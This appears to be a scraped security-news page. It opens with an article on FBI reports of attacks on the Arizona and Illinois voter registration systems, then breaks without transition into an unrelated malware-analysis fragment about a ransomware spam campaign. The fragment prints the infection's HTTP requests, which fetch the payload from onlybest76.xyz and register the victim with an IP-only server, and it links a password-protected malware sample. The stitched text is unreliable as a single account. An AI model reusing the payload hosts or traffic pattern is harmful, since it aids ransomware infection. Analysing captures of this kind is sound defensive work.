Information Security News
by Sean Gallagher
The profile of attacks on two US state voter registration systems this summer presented in an FBI "Flash" memo suggests that the states were hit by a fairly typical sort of intrusion. But an Arizona official said that the Federal Bureau of Investigation had attributed an attack that succeeded only in capturing a single user's login credentials to Russian hackers and rated the threat from the attack as an "eight on a scale of ten" in severity. An Illinois state official characterized the more successful attack on that state's system as "highly sophisticated" based on information from the FBI.
Arizona Secretary of State Office Communications Director Matt Roberts told the Post's Ellen Nakashima that the FBI had alerted Arizona officials in June of an attack by Russians, though the FBI did not state whether they were state-sponsored or criminal hackers. The attack did not gain access to any state or county voter registration system, but the username and password of a single election official was stolen. Roberts did not respond to requests from Ars for clarification on the timeline and other details of the attack.
Based on the details provided by Roberts to the Post, it's not clear if the Arizona incident was one of the two referred to in the FBI "Flash" published this month. The FBI has not responded to questions about the memorandum on the attacks first published publicly by Yahoo News' Michael Isikoff, but a SQL injection attack wouldn't seem to be the likely culprit for stealing a single username and password. It's more likely that the Gila County election official whose credentials were stolen was the victim of a phishing attack or malware.
Todays subject for the e-mail was Transaction details. Once the user runs the script by double-clicking the file, it will download the actual crypto ransomware.
GET /2tn0o HTTP/1.1Accept: */*Accept-Language: en-usAccept-Encoding: gzip, deflate .NET CLR 3.5.30729)Host: onlybest76.xyzConnection: Keep-Alive
Just like earlier versions, it then registers the infected system with a website that is only identified by its IP address, so you will not see a DNS lookup for it:
POST /data/info.php HTTP/1.1Accept: */*Accept-Language: en-usReferer: http://126.96.36.199/data/x-requested-with: XMLHttpRequestContent-Type: application/x-www-form-urlencodedAccept-Encoding: gzip, deflateCache-Control: no-cache .NET CLR 3.5.30729)Host: 188.8.131.52Content-Length: 942Connection: Keep-Alive
[post data omitted]
Anti-Malware proves its usual value by doing probably slightly better than a blind chicken in protecting you from this malware. You can download a file with packet capture, mail server logs, and the malware sample here (password: blind chicken ).
Between 9am and 1:30pm UTC, I received 1425 e-mails that match this pattern.